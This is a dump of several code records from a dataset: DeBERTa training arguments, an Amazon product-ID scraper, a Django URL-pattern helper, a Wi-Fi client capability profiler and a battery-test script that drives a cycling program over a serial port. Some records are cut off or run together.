performing a backward/update pass.\")\n\n parser.add_argument('--fp16',\n default=False,\n type=boolean_string,\n help=\"Whether to use 16-bit float precision instead of 32-bit\")\n\n parser.add_argument('--loss_scale',\n type=float, default=256,\n help='Loss scaling, positive power of 2 values can improve fp16 convergence.')\n\n parser.add_argument('--scale_steps',\n type=int, default=1000,\n help='The steps to wait to increase the loss scale.')\n\n parser.add_argument('--init_model',\n type=str,\n help=\"The model state file used to initialize the model weights.\")\n\n parser.add_argument('--model_config',\n type=str,\n help=\"The config file of bert model.\")\n\n parser.add_argument('--cls_drop_out',\n type=float,\n default=None,\n help=\"The config file model initialization and fine tuning.\")\n parser.add_argument('--weight_decay',\n type=float,\n default=0.01,\n help=\"The weight decay rate\")\n\n parser.add_argument('--tag',\n type=str,\n default='final',\n help=\"The tag name of current prediction/runs.\")\n\n parser.add_argument(\"--dump_interval\",\n default=10000,\n type=int,\n help=\"Interval steps for generating checkpoint.\")\n\n parser.add_argument('--lookahead_k',\n default=-1,\n type=int,\n help=\"lookahead k parameter\")\n\n parser.add_argument('--lookahead_alpha',\n default=0.5,\n type=float,\n help=\"lookahead alpha parameter\")\n\n parser.add_argument('--with_radam',\n default=False,\n type=boolean_string,\n help=\"whether to use RAdam\")\n\n parser.add_argument('--opt_type',\n type=str.lower,\n default='adam',\n choices=['adam', 'admax'],\n help=\"The optimizer to be used.\")\n\n parser.add_argument('--workers',\n type=int,\n default=2,\n help=\"The workers to load data.\")\n\n parser.add_argument('--debug',\n default=False,\n type=boolean_string,\n help=\"Whether to cache cooked binary features\")\n\n parser.add_argument('--pre_trained',\n default=None,\n type=str,\n help=\"The path of pre-trained RoBERTa model\")\n return parser\n\nif __name__ == \"__main__\":\n parser = build_argument_parser()\n args = parser.parse_args()\n logger = set_logger(args.task_name, os.path.join(args.output_dir, 'training_{}.log'.format(args.task_name)))\n logger.info(args)\n try:\n main(args)\n except Exception as ex:\n try:\n logger.exception(f'Uncatched exception happened during execution.')\n import atexit\n atexit._run_exitfuncs()\n except:\n pass\n kill_children()\n os._exit(-1)\n","sub_path":"DeBERTa/apps/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124477762","text":"import scrapy\nimport re\n\nclass ASIN_Spider(scrapy.Spider):\n name = \"ASIN_Spider\"\n start_urls = ['https://www.amazon.com/s?k=water&ref=nb_sb_noss_2']\n\n def __int__(self, query):\n self.query = query\n\n def parse(self, response):\n ASIN_dict = {}\n for ind in range(2, 200):\n try:\n asin_div = response.xpath(\"/html/body/div[1]/div[2]/div[1]/div[2]/div/span[3]/div[2]/div[\"+str(ind)+\"]\").re_first(\"
[\\w-]+)'\npk = r'(?P\\d+)'\nuuid4 = r'(?P[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12})' # noqa\nrest = r'(?P[\\w\\-\\_\\.\\@\\:/]*)' # match anything acceptable in URL\n\nyear = r'(?P\\d{4})'\nmonth = r'(?P0?([1-9])|10|11|12)'\nday = r'(?P(0|1|2)?([1-9])|[1-3]0|31)'\n\nSEPARATOR = '/' # separator for parts of the url\n\nRE_TYPE = re._pattern_type # pylint:disable=protected-access\n\n\nclass URLPattern(object):\n \"\"\"The main urljects object able to join strings and regular expressions.\n\n The value of this object will always be regular expression usable in django\n url.\n \"\"\"\n\n def __init__(self, value=None, separator=SEPARATOR, ends=True):\n \"\"\"\n :param value: Initial value of the URL\n :param separator: used to separate parts of the url, usually /\n :param ends: open urls should be used only for included urls\n \"\"\"\n self.parts = [value.strip(separator)] if value else []\n self.separator = separator\n self.ends = ends\n if value:\n warnings.warn(DeprecationWarning(\n \"'value' in URLPattern constructor will be removed\"))\n self.add_part(value)\n\n def add_part(self, part):\n \"\"\"\n Function for adding partial pattern to the value\n :param part: string or compiled pattern\n \"\"\"\n if isinstance(part, RE_TYPE):\n part = part.pattern\n\n # stripping separator enables translated urls with hint what\n # string is actual url and which is a normal word\n # url(U / _('/my-profile'), private.Home, name=\"admin-home\"),\n self.parts.append(part.strip(self.separator))\n return self\n\n def get_value(self, ends_override=None):\n \"\"\"\n This function finishes the url pattern creation by adding starting\n character ^ end possibly by adding end character at the end\n\n :param ends_override: overrides ``self.ends``\n :return: raw string\n \"\"\"\n value = self.separator.join(self.parts)\n ends = ends_override if ends_override is not None else self.ends\n\n if not value: # use case: wild card imports\n if ends:\n return r'^$'\n return r'^'\n\n if value[0] != beginning:\n value = beginning + value\n\n if ends and value[-1] != end:\n value += end\n\n # included views usually ends with separator\n if not ends and value[-1] != self.separator:\n value += self.separator\n\n return value\n\n def __div__(self, other):\n \"\"\"\n PY2 division\n \"\"\"\n return self.add_part(other)\n\n def __truediv__(self, other):\n \"\"\"\n PY3 division\n \"\"\"\n return self.add_part(other)\n\n def __repr__(self):\n return self.get_value() or ''\n\n\nclass URLFactory(object):\n \"\"\"Create new URLPattern on every beginning of a new URL.\"\"\"\n\n def __div__(self, other):\n return URLPattern().add_part(other)\n __truediv__ = __div__\n\n def get_value(self, ends_override=None):\n \"\"\"Dispatch the call to URLPattern instance.\"\"\"\n return URLPattern().add_part('').get_value(ends_override)\n __repr__ = get_value\n __str__ = get_value\n\n\nU = URLFactory()\n","sub_path":"urljects/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61699055","text":"# -*- coding: utf-8 -*-\n#\n# profiler2: a Wi-Fi client capability analyzer\n# Copyright 2020 Josh Schmelzle\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nprofiler2.profiler\n~~~~~~~~~~~~~~~~~~\n\nprofiler code goes here, separate from fake ap code.\n\"\"\"\n\n# standard library imports\nimport csv\nimport inspect\nimport logging\nimport os\nimport sys\nimport time\nfrom difflib import Differ\nfrom multiprocessing.queues import Queue\nfrom typing import Tuple\n\n# third party imports\nfrom manuf import manuf\nfrom scapy.all import wrpcap\n\n# app imports\nfrom .constants import (EXT_CAPABILITIES_IE_TAG, EXT_IE_TAG,\n FT_CAPABILITIES_IE_TAG, HT_CAPABILITIES_IE_TAG,\n POWER_MIN_MAX_IE_TAG, RM_CAPABILITIES_IE_TAG,\n RSN_CAPABILITIES_IE_TAG, SUPPORTED_CHANNELS_IE_TAG,\n VENDOR_SPECIFIC_IE_TAG, VHT_CAPABILITIES_IE_TAG)\nfrom .helpers import Capability, flag_last_object\n\n\nclass Profiler(object):\n \"\"\" Code handling analysis of client capablities \"\"\"\n\n def __init__(self, config=None, queue=None):\n self.log = logging.getLogger(inspect.stack()[0][1].split(\"/\")[-1])\n self.log.debug(\"profiler pid: %s; parent pid: %s\", os.getpid(), os.getppid())\n self.analyzed_hash = {}\n self.config = config\n if config:\n self.channel = int(config.get(\"GENERAL\").get(\"channel\"))\n self.ssid = config.get(\"GENERAL\").get(\"ssid\")\n self.files_path = config.get(\"GENERAL\").get(\"files_path\")\n self.pcap_analysis = config.get(\"GENERAL\").get(\"pcap_analysis\")\n self.ft_disabled = config.get(\"GENERAL\").get(\"ft_disabled\")\n self.he_disabled = config.get(\"GENERAL\").get(\"he_disabled\")\n self.reports_dir = os.path.join(self.files_path, \"reports\")\n self.clients_dir = os.path.join(self.files_path, \"clients\")\n self.csv_file = os.path.join(\n self.reports_dir, f\"profiler-{time.strftime('%Y-%m-%d')}.csv\"\n )\n self.client_profiled_count = 0\n self.lookup = manuf.MacParser(update=False)\n self.last_manuf = \"N/A\"\n\n if queue:\n while True:\n self.profile(queue)\n\n def __del__(self):\n \"\"\" Clean up while we shut down \"\"\"\n\n def is_randomized(self, mac) -> bool:\n \"\"\" Check if MAC Address :'00:00:00:00:00:00' is locally assigned \"\"\"\n return any(local == mac[1] for local in [\"2\", \"6\", \"a\", \"e\"])\n\n def profile(self, queue: Queue) -> None:\n \"\"\" Handle profiling clients as they come into the queue \"\"\"\n frame = queue.get()\n oui_manuf, capabilities = self.analyze_assoc_req(frame)\n analysis_hash = hash(f\"{frame.addr2}: {capabilities}\")\n if analysis_hash in self.analyzed_hash.keys():\n self.log.debug(\n \"already seen %s (capabilities hash=%s) this session, ignoring...\",\n frame.addr2,\n analysis_hash,\n )\n else:\n\n if self.is_randomized(frame.addr2):\n if oui_manuf is None:\n oui_manuf = \"Randomized MAC\"\n else:\n oui_manuf = \"{0} (Randomized MAC)\".format(oui_manuf)\n\n self.last_manuf = oui_manuf\n self.log.debug(\"%s oui lookup matched to %s\", frame.addr2, oui_manuf)\n self.analyzed_hash[analysis_hash] = frame\n text_report = self.generate_text_report(\n oui_manuf, capabilities, frame.addr2, self.channel\n )\n\n self.log.info(\"text report\\n%s\", text_report)\n\n if self.channel < 15:\n band = \"2.4GHz\"\n elif self.channel > 30 and self.channel < 170:\n band = \"5.8GHz\"\n else:\n band = \"unknown\"\n\n self.log.debug(\n \"writing text and csv report for %s (capabilities hash=%s)\",\n frame.addr2,\n analysis_hash,\n )\n self.write_analysis_to_file_system(\n text_report, capabilities, frame, oui_manuf, band\n )\n\n self.client_profiled_count += 1\n self.log.debug(\"%s clients profiled\", self.client_profiled_count)\n\n # if we end up sending multiple frames from pcap for profiling - this will need changed\n if self.pcap_analysis:\n self.log.info(\n \"exiting because we were told to only analyze %s\",\n self.pcap_analysis,\n )\n sys.exit()\n\n @staticmethod\n def generate_text_report(\n oui_manuf: str, capabilities: list, client_mac: str, channel: int\n ) -> str:\n \"\"\" Generate a report for output \"\"\"\n # start report\n text_report = \"-\" * 45\n text_report += f\"\\n - Client MAC: {client_mac}\"\n text_report += f\"\\n - OUI manufacturer lookup: {oui_manuf or 'Unknown'}\"\n text_report += f\"\\n - Capture channel: {channel}\\n\"\n text_report += \"-\" * 45\n text_report += \"\\n\"\n for capability in capabilities:\n if capability.name is not None and capability.value is not None:\n text_report += (\n \"{0:<20} {1:<20}\".format(capability.name, capability.value) + \"\\n\"\n )\n\n text_report += \"\\n* Reported client capabilities are dependent on available features at time of client association.\"\n text_report += \"\\n** Reported channels do not factor local regulatory domain.\"\n return text_report\n\n def write_analysis_to_file_system(\n self, text_report, capabilities, frame, oui_manuf, band\n ):\n \"\"\" Write report files out to a directory on the WLAN Pi \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n # dump out the text to a file\n client_mac = frame.addr2.replace(\":\", \"-\", 5)\n dest = os.path.join(self.clients_dir, client_mac)\n\n if not os.path.isdir(dest):\n try:\n os.mkdir(dest)\n except Exception:\n log.error(\"problem creating %s directory\", dest)\n sys.exit(-1)\n\n filename = os.path.join(dest, f\"{client_mac}_{band}.txt\")\n\n try:\n if os.path.exists(filename):\n\n existing = open(filename, \"r\").readlines()\n temp = []\n for line in existing:\n temp.append(line.replace(\"\\n\", \"\"))\n existing = temp\n new = text_report.split(\"\\n\")\n # strip header when comparing existing file from newly profiled\n if existing[5:] == new[5:]:\n pass\n else:\n text_report = list(\n Differ().compare(existing, text_report.split(\"\\n\"))\n )\n filename = filename.replace(\".txt\", \"_changed.txt\")\n text_report = \"\\n\".join(text_report)\n with open(filename, \"w\") as writer:\n writer.write(text_report)\n except Exception:\n log.exception(\"error creating flat file to dump client info (%s)\", filename)\n sys.exit(-1)\n\n out_row = {\"Client_Mac\": client_mac, \"OUI_Manuf\": oui_manuf}\n\n out_fieldnames = [\"Client_Mac\", \"OUI_Manuf\"]\n\n for capability in capabilities:\n if capability.name is not None and capability.value is not None:\n out_fieldnames.append(capability.name)\n out_row[capability.name] = capability.value\n\n # dump out the frame to a file\n filename = os.path.splitext(filename)[0] + \".pcap\"\n wrpcap(filename, [frame])\n\n # check if csv file exists\n if not os.path.exists(self.csv_file):\n\n # create file with csv headers\n with open(self.csv_file, mode=\"w\") as file_obj:\n writer = csv.DictWriter(file_obj, fieldnames=out_fieldnames)\n writer.writeheader()\n\n # append data to csv file\n with open(self.csv_file, mode=\"a\") as file_obj:\n writer = csv.DictWriter(file_obj, fieldnames=out_fieldnames)\n writer.writerow(out_row)\n\n @staticmethod\n def process_information_elements(buffer: bytes) -> dict:\n \"\"\"\n Parse a 802.11 payload and returns a dict of IEs\n\n Does not handle headers or FCS.\n\n You must strip those before passing the payload in.\n \"\"\"\n # init element vars\n information_elements = {}\n element_id = 0\n element_length = 0\n element_data = []\n # loop tracking vars\n is_index_byte = True\n is_length_byte = True\n index = 0\n for byte, last in flag_last_object(buffer):\n if is_index_byte:\n element_id = byte\n is_index_byte = False\n continue\n if is_length_byte:\n element_length = byte\n is_length_byte = False\n continue\n if index < element_length:\n index += 1\n element_data.append(byte)\n else:\n if element_id in [VENDOR_SPECIFIC_IE_TAG, EXT_IE_TAG]:\n # map a list of data items to the key\n if element_id in information_elements:\n information_elements[element_id].append(element_data)\n else:\n information_elements[element_id] = [element_data]\n else:\n # map the data to the key\n information_elements[element_id] = element_data\n\n # reset vars to decode next information element\n index = 0\n is_index_byte = True\n is_length_byte = True\n element_data = []\n element_id = 0\n element_length = 0\n # current byte should be next index byte\n element_id = byte\n is_index_byte = False\n continue\n if last:\n if element_id in [VENDOR_SPECIFIC_IE_TAG, EXT_IE_TAG]:\n # map a list of data items to the key\n if element_id in information_elements:\n information_elements[element_id].append(element_data)\n else:\n information_elements[element_id] = [element_data]\n else:\n # map the data to the key\n information_elements[element_id] = element_data\n\n return information_elements\n\n def resolve_oui_manuf(self, mac: str, dot11_elt_dict: dict) -> str:\n \"\"\" Resolve client's manuf using manuf database and other heuristics \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n\n # log.debug(\"starting oui lookup for %s\", mac)\n oui_manuf = self.lookup.get_manuf(mac)\n\n # vendor OUI that we possibly want to check for a more clear OUI match\n low_quality = \"muratama\"\n\n if oui_manuf is None or oui_manuf.lower().startswith(low_quality):\n # inspect vendor specific IEs and see if there's an IE with\n # an OUI that we know can only be included if the manuf\n # of the client is the vendor that maps to that OUI\n if VENDOR_SPECIFIC_IE_TAG in dot11_elt_dict.keys():\n for element_data in dot11_elt_dict[VENDOR_SPECIFIC_IE_TAG]:\n vendor_mac = \"{0:02X}:{1:02X}:{2:02X}:00:00:00\".format(\n element_data[0], element_data[1], element_data[2]\n )\n oui_manuf_vendor = self.lookup.get_manuf(vendor_mac)\n if oui_manuf_vendor is not None:\n # Matches are vendor specific IEs we know are client specific\n # e.g. Apple vendor specific IEs can only be found in Apple devices\n # Samsung may follow similar logic based on S10 5G testing, but unsure\n matches = (\"apple\", \"samsung\")\n if oui_manuf_vendor.lower().startswith(matches):\n oui_manuf = oui_manuf_vendor\n\n log.debug(\"finished oui lookup for %s: %s\", mac, oui_manuf)\n return oui_manuf\n\n @staticmethod\n def analyze_ht_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11n support \"\"\"\n dot11n = Capability(\n name=\"802.11n\", value=\"Not reported*\", db_key=\"802.11n\", db_value=0\n )\n dot11n_ss = Capability(db_key=\"802.11n_ss\", db_value=0)\n\n if HT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n spatial_streams = 0\n\n # mcs octets 1 - 4 indicate # streams supported (up to 4 streams only)\n for mcs_octet in range(3, 7):\n\n mcs_octet_value = dot11_elt_dict[HT_CAPABILITIES_IE_TAG][mcs_octet]\n\n if mcs_octet_value & 255:\n spatial_streams += 1\n\n dot11n.value = f\"Supported ({spatial_streams}ss)\"\n dot11n.db_value = 1\n dot11n_ss.db_value = spatial_streams\n\n return [dot11n, dot11n_ss]\n\n @staticmethod\n def analyze_vht_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11ac support \"\"\"\n dot11ac = Capability(\n name=\"802.11ac\", value=\"Not reported*\", db_key=\"802.11ac\", db_value=0\n )\n dot11ac_ss = Capability(db_key=\"802.11ac_ss\", db_value=0)\n dot11ac_su_bf = Capability(db_key=\"802.11ac_su_bf\", db_value=0)\n dot11ac_mu_bf = Capability(db_key=\"802.11ac_mu_bf\", db_value=0)\n\n if VHT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n # Check for number streams supported\n mcs_upper_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][5]\n mcs_lower_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][4]\n mcs_rx_map = (mcs_upper_octet * 256) + mcs_lower_octet\n\n # define the bit pair we need to look at\n spatial_streams = 0\n stream_mask = 3\n\n # move through each bit pair & test for '10' (stream supported)\n for _mcs_bits in range(1, 9):\n\n if (mcs_rx_map & stream_mask) != stream_mask:\n\n # stream mask bits both '1' when mcs map range not supported\n spatial_streams += 1\n\n # shift to next mcs range bit pair (stream)\n stream_mask = stream_mask * 4\n\n dot11ac.value = f\"Supported ({spatial_streams}ss)\"\n dot11ac.db_value = 1\n dot11ac_ss.db_value = spatial_streams\n\n # check for SU & MU beam formee support\n mu_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][2]\n su_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][1]\n\n beam_form_mask = 16\n\n # bit 4 indicates support for both octets (1 = supported, 0 = not supported)\n if su_octet & beam_form_mask:\n dot11ac.value += \", SU BF supported\"\n dot11ac_su_bf.db_value = 1\n else:\n dot11ac.value += \", SU BF not supported\"\n\n if mu_octet & beam_form_mask:\n dot11ac.value += \", MU BF supported\"\n dot11ac_mu_bf.db_value = 1\n else:\n dot11ac.value += \", MU BF not supported\"\n\n return [dot11ac, dot11ac_ss, dot11ac_su_bf, dot11ac_mu_bf]\n\n @staticmethod\n def analyze_rm_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11k support \"\"\"\n dot11k = Capability(\n name=\"802.11k\",\n value=\"Not reported* - treat with caution, many clients lie about this\",\n db_key=\"802.11k\",\n db_value=0,\n )\n if RM_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n dot11k.value = \"Supported\"\n dot11k.db_value = 1\n\n return [dot11k]\n\n @staticmethod\n def analyze_ft_capabilities_ie(dot11_elt_dict: dict, ft_disabled: bool) -> []:\n \"\"\" Check for 802.11r support \"\"\"\n dot11r = Capability(\n name=\"802.11r\", value=\"Not reported*\", db_key=\"802.11r\", db_value=0\n )\n if ft_disabled:\n dot11r.value = \"Reporting disabled (--no11r option used)\"\n elif FT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n dot11r.value = \"Supported\"\n dot11r.db_value = 1\n else:\n pass\n\n return [dot11r]\n\n @staticmethod\n def analyze_ext_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11v support \"\"\"\n dot11v = Capability(\n name=\"802.11v\", value=\"Not reported*\", db_key=\"802.11v\", db_value=0\n )\n\n if EXT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n ext_cap_list = dot11_elt_dict[EXT_CAPABILITIES_IE_TAG]\n\n # check octet 3 exists\n if 3 <= len(ext_cap_list):\n\n # bit 4 of octet 3 in the extended capabilites field\n octet3 = ext_cap_list[2]\n bss_trans_support = int(\"00001000\", 2)\n\n # 'And' octet 3 to test for bss transition support\n if octet3 & bss_trans_support:\n dot11v.value = \"Supported\"\n dot11v.db_value = 1\n\n return [dot11v]\n\n @staticmethod\n def analyze_rsn_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11w support \"\"\"\n dot11w = Capability(\n name=\"802.11w\", value=\"Not reported\", db_key=\"802.11w\", db_value=0\n )\n\n if RSN_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n rsn_cap_list = dot11_elt_dict[RSN_CAPABILITIES_IE_TAG]\n rsn_len = len(rsn_cap_list) - 2\n pmf_oct = rsn_cap_list[rsn_len]\n\n # bit 8 of 2nd last octet in the rsn capabilites field\n if 127 <= pmf_oct:\n dot11w.value = \"Supported\"\n dot11w.db_value = 1\n\n return [dot11w]\n\n @staticmethod\n def analyze_power_capability_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for supported power capabilities \"\"\"\n max_power_cap = Capability(\n name=\"Max_Power\",\n value=\"Not reported\",\n db_key=\"max_power\",\n db_value=\"Not reported\",\n )\n min_power_cap = Capability(\n name=\"Min_Power\",\n value=\"Not reported\",\n db_key=\"min_power\",\n db_value=\"Not reported\",\n )\n\n if POWER_MIN_MAX_IE_TAG in dot11_elt_dict.keys():\n\n # octet 3 of power capabilites\n max_power = dot11_elt_dict[POWER_MIN_MAX_IE_TAG][1]\n min_power = dot11_elt_dict[POWER_MIN_MAX_IE_TAG][0]\n\n # check if signed\n if min_power > 127:\n signed_min_power = (256 - min_power) * (-1)\n else:\n signed_min_power = min_power\n\n max_power_cap.value = f\"{max_power} dBm\"\n max_power_cap.db_value = max_power\n min_power_cap.value = f\"{signed_min_power} dBm\"\n min_power_cap.db_value = signed_min_power\n\n return [max_power_cap, min_power_cap]\n\n @staticmethod\n def analyze_supported_channels_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check supported channels \"\"\"\n supported_channels = Capability(\n name=\"Supported_Channels\",\n value=\"Not reported\",\n db_key=\"SupportedChannels\",\n db_value=None,\n )\n if SUPPORTED_CHANNELS_IE_TAG in dot11_elt_dict.keys():\n channel_sets_list = dot11_elt_dict[SUPPORTED_CHANNELS_IE_TAG]\n channel_list = []\n\n while channel_sets_list:\n\n start_channel = channel_sets_list.pop(0)\n channel_range = channel_sets_list.pop(0)\n\n # check for if 2.4Ghz or 5GHz\n if start_channel > 14:\n channel_multiplier = 4\n else:\n channel_multiplier = 1\n\n for i in range(channel_range):\n channel_list.append(start_channel + (i * channel_multiplier))\n\n supported_channels.value = \",\".join(map(str, channel_list))\n supported_channels.db_value = channel_list\n\n return [supported_channels]\n\n @staticmethod\n def analyze_extension_ies(dot11_elt_dict: dict, he_disabled: bool) -> []:\n \"\"\" Check for 802.11ax support \"\"\"\n dot11ax_draft = Capability(\n name=\"802.11ax_draft\",\n value=\"Not supported\",\n db_key=\"802.11ax_draft\",\n db_value=\"0\",\n )\n if he_disabled:\n dot11ax_draft.value = \"Reporting disabled (--no11ax option used)\"\n else:\n if EXT_IE_TAG in dot11_elt_dict.keys():\n for element_data in dot11_elt_dict[EXT_IE_TAG]:\n\n ext_ie_id = str(element_data[0])\n\n dot11ax_draft_ids = {\"35\": \"802.11ax (Draft)\"}\n\n # check for 802.11ax support\n if ext_ie_id in dot11ax_draft_ids.keys():\n dot11ax_draft.value = \"Supported (Draft)\"\n dot11ax_draft.db_value = 1\n\n return [dot11ax_draft]\n\n def analyze_assoc_req(self, frame) -> Tuple[str, list]:\n \"\"\" Tear apart the association request for analysis \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n\n # log.debug(\"processing information elements for client MAC %s\", frame.addr2)\n\n # strip radiotap\n ie_buffer = bytes(frame.payload)\n\n # strip dot11\n ie_buffer = ie_buffer[24:]\n\n # strip params\n ie_buffer = ie_buffer[4:]\n\n # strip fcs\n ie_buffer = ie_buffer[:-4]\n\n # convert buffer to ie dict\n dot11_elt_dict = self.process_information_elements(ie_buffer)\n\n log.debug(\n \"%s IEs detected in assoc req from %s: %s\",\n len(dot11_elt_dict),\n frame.addr2,\n dot11_elt_dict.keys(),\n )\n\n # resolve manufacturer\n oui_manuf = self.resolve_oui_manuf(frame.addr2, dot11_elt_dict)\n\n # dictionary to store capabilities as we decode them\n capabilities = []\n\n # check if 11k supported\n capabilities += self.analyze_rm_capabilities_ie(dot11_elt_dict)\n\n # check if 11r supported\n capabilities += self.analyze_ft_capabilities_ie(\n dot11_elt_dict, self.ft_disabled\n )\n\n # check if 11v supported\n capabilities += self.analyze_ext_capabilities_ie(dot11_elt_dict)\n\n # check if 11w supported\n capabilities += self.analyze_rsn_capabilities_ie(dot11_elt_dict)\n\n # check for 11n support\n capabilities += self.analyze_ht_capabilities_ie(dot11_elt_dict)\n\n # check for 11ac support\n capabilities += self.analyze_vht_capabilities_ie(dot11_elt_dict)\n\n # check for Ext tags (e.g. 802.11ax draft support)\n capabilities += self.analyze_extension_ies(dot11_elt_dict, self.he_disabled)\n\n # check supported power capabilities\n capabilities += self.analyze_power_capability_ie(dot11_elt_dict)\n\n # check supported channels\n capabilities += self.analyze_supported_channels_ie(dot11_elt_dict)\n\n return oui_manuf, capabilities\n","sub_path":"profiler2/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":24733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43315603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 13:24:35 2019\n@author: Alexander\nSummary: Class used to measure the entropy coefficient as there is a change in\n temperature and consequentially the OCV. Each test must take 21 hours\nNote to self: Remember to add '/test' before you describe what test type it is\nNote to self: Add escape characters to file paths \\\\ not \\\nNote to self: Add shell=True and then pass a string\nNote to self: executables that run through the shell will halt the program. Must use popen, call will block your program\nNote to self: ser.readline also includes the new line char and carraige return, get rid of '/r/n' by using [:-2]\nNote to self: When trying to write to a file using the print function you must specify that print(\"text\",file=FILEOBJJ) otherwise it won't write\n\"\"\"\nimport subprocess # Use so that you can call shell commands\nimport time\nimport serial\nimport os\n\n\nfrom TemperatureClass import TemperatureClass\n\n# Gives the battery type as a string\ndef BatteryType():\n capacity = 3.0\n ChemType = \"Li-ion\"\n return \"/battery \"+str(capacity)+\",1,3.7,1,\"+ChemType\n\nclass CBA_ConstantDischargeRate:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory):\n TestName = \"/test discharge 0.125 /cutoff 2.8 /samplerate 1000\" # the cut off is always 2.8V\n GraphOptions = \"/title \\\"OCV Estimate 0.125 Discharge [A]\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\OCVEstimateTest_0125_A.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(CommandString) # test\n subprocess.Popen(CommandString,shell=True)\n\nclass CBA_Charge:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,Amps,GraphExt):\n self.CutOff = 0.2\n Cycles = 1\n HighVoltage = 4.75\n TestName = \"/test chargedischarge \\\"Charge\\\",\"+str(Cycles)+\",\"+str(Amps)+\",\"+str(HighVoltage)+\" /chargeampmin 0.2 /chargerecovery 3 /dischargerecovery 3 /cutoff 2.8 /samplerate 1000 /graphcurrent\"\n GraphOptions = \"/title \\\"Charge At \"+str(GraphExt)+\" [W]\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\ChargeFrom_\"+str(GraphExt)+\"_W.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(CommandString) # test\n subprocess.Popen(CommandString,shell=True)\n \nclass CBA_FirstCharge:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,Amps):\n self.CutOff = 0.2\n Cycles = 1\n HighVoltage = 4.75\n TestName = \"/test chargedischarge \\\"Charge\\\",\"+str(Cycles)+\",\"+str(Amps)+\",\"+str(HighVoltage)+\" /chargeampmin 0.2 /chargerecovery 3 /dischargerecovery 3 /cutoff 2.8 /samplerate 1000 /graphcurrent\"\n GraphOptions = \"/title \\\"First Charge\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\FirstCharge.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(\"command = \"+CommandString)\n subprocess.Popen(CommandString,shell=True)\n \nclass OCVEstimateClass:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,MaxTemperature):\n self.CBAPID = \"\" # No CBA instance should be running\n self.MaxT = MaxTemperature # Maximum temperature before stopping the test\n \n if self.DoesCBAExist() == True: # Checks to see if there are any instances of the CBA program running, if so it will kill them\n print(\"ERROR: THere are multiple instances of CBA when starting\")\n self.KillExcessCBA()\n \n ser = serial.Serial() # A serial communications instance Called ser\n ser.baudrate = 9600 \n ser.port = 'COM3' # The Communications court will have to be changed depending upon the device used.\n ser.open()\n \n try: # Attmps to read and write to the serial port\n print(\"Opened the serial port 